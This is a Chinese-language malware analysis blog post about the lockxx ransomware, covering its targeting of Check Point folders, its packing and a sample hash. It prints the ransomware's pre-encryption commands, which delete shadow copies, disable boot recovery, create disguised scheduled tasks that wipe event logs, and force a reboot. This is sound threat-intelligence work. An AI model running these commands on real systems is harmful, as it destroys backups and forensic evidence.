lockxx是最近出现的一个新的勒索软件,它使用了中英文提示来针对受害者进行勒索,笔者在对勒索软件进行了初步分析,发现似乎对checkpoint情有独钟,排除目录不仅排除了checkpoint目录,而且也排除了HarmonyBackup目录,通过checkpoint官网了解,这个文件夹在checkpoint所有版本的端点防护产品中都是存在的,这体现出了一定的针对性。
图1 被排除的目录
图2 关于HarmonyBackup目录说明
笔者了解到ida123.com的域名是一个已过期的域名,曾经ip解析到香港
图3 解出公钥与命令行等信息
图4 唯独这块代码不能F5成功
图5 内存中加密代码特征
加密前调用的命令行参数
cmd.exe /c "wmic shadowcopy delete /nointeractive"
cmd.exe /c "bcdedit /set {default} recoveryenabled No"
cmd.exe /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
cmd.exe /c "vssadmin delete shadows /All /Quiet"
cmd.exe /c schtasks /create /sc minute /mo 5 /tn "Windows update00" /tr "c:pipein" /ru "" /RL HIGHEST
cmd.exe /c schtasks /create /sc minute /mo 5 /tn "Windows update01" /tr "Powershell wevtutil el | Foreach-Object {Write-Host "Clearing $_"; wevtutil cl "$_"}" /ru "" /RL HIGHEST
cmd.exe /c schtasks /delete /tn "Windows update00" /f
cmd.exe /c schtasks /create /tn shutdown00 /tr "shutdown -r -t 0" /sc once /st 09:01:28 /ru ""
加密结束后执行的自销毁代码
图6 启动并注入explorer进程,跪求正常死亡
图7 lockxx在勒索信中使用了中英文方便受害者查看切换
图8 加密完成后的日志信息
总体评价:lockxx无论在反调试、反编译以及自销毁方面都极为小心,文件加了upx壳,就不写yara了,下述为样本hash
D156711735A2FB0992440A2CD0A19138
原文始发于微信公众号(锐眼安全实验室):lockxx勒索软件对受害者使用了中英文提示
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论